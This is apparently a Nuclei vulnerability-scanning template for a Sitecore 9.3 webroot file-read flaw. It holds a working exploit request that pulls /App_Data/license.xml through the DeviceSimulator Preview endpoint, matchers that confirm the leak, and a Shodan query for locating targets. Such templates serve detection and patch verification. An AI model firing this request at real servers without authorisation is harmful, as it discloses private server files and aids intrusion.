id: sitecore-lfi

info:
  name: Sitecore 9.3 - Webroot File Read
  author: DhiyaneshDK
  severity: high
  reference:
    - https://blog.assetnote.io/2023/05/10/sitecore-round-two/
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"Sitecore"
  tags: sitecore,lfi,misconfig

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/sitecore/Sitecore.Mvc.DeviceSimulator.Controllers.SimulatorController,Sitecore.Mvc.DeviceSimulator.dll/Preview?previewPath=/App_Data/license.xml"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<signedlicense id="
          - "<Signature"
        condition: and

      - type: status
        status:
          - 200

# digest: 4a0a004730450221009e359a27a6fbfc5d6d250fd7fcf4a5046af47b8206fba0d418aab933fb648ad2022017d9de93df4875a02db635721ef51289eda8747dc7bb6d26c4eacedbf0c28c43:922c64590222798bb761d5b6d8e72950
